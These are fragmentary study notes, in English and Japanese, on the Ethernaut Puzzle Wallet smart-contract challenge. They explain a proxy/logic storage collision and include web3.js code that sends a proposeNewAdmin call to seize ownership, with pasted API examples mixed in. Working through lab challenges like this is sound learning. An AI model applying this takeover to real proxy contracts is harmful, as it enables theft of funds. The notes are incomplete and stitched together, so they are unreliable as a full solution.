To do so, they voted and assigned two people with special roles in the system:
The vulnerability here arises due to storage collision between the proxy contract (PuzzleProxy
) and logic contract (PuzzleWallet
). And storage collision is a nightmare when using delegatecall
.
別にdelegateの前に起きていたってことか
Although contract
instance provided web3js
API, doesn't expose the proposeNewAdmin
method, we can always encode the signature of a function call and send a transaction to the contract:
functionJson = {
name: 'proposeNewAdmin',
type: "function",
inputs: [
{
type:"address",//arguments type
name: "_newAdmin" //arguments name
}
]
}
params = [player] // to change the owner to player
data = web3.eth.abi.encodeFunctionCall(functionJson, params);
await web3.eth.sendTransaction({from: player, to: instance, data})
web3.eth.abi.encodeFunctionCall({
name: 'myMethod',
type: 'function',
inputs: [{
type: 'uint256',
name: 'myNumber'
},{
type: 'string',
name: 'myString'
}]
}, ['2345675643', 'Hello!%']); //arguments
web3.eth.abi.encodeFunctionCall(jsonInterface, parameters);
web3.eth.sendTransaction({
from: "0xEB014f8c8B418Db6b45774c326A0E64C78914dC0",
gasPrice: "20000000000",
gas: "21000",
to: '0x3535353535353535353535353535353535353535',
value: "1000000000000000000",
data: ""
}, 'MyPassword!').then(console.log);
> '0xda3be87732110de6c1354c83770aae630ede9ac308d9f7b399ecfba23d923384'
adminを変更したい!
maxBalanceが対応しているからそれを変更すればOK
but init is required some conditions
function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
require(address(this).balance == 0, "Contract balance is not 0");
maxBalance = _maxBalance;
}
----------------------------------------------
await getBalance(contract.address)
// Output: 0.001
how to reduce the balance of address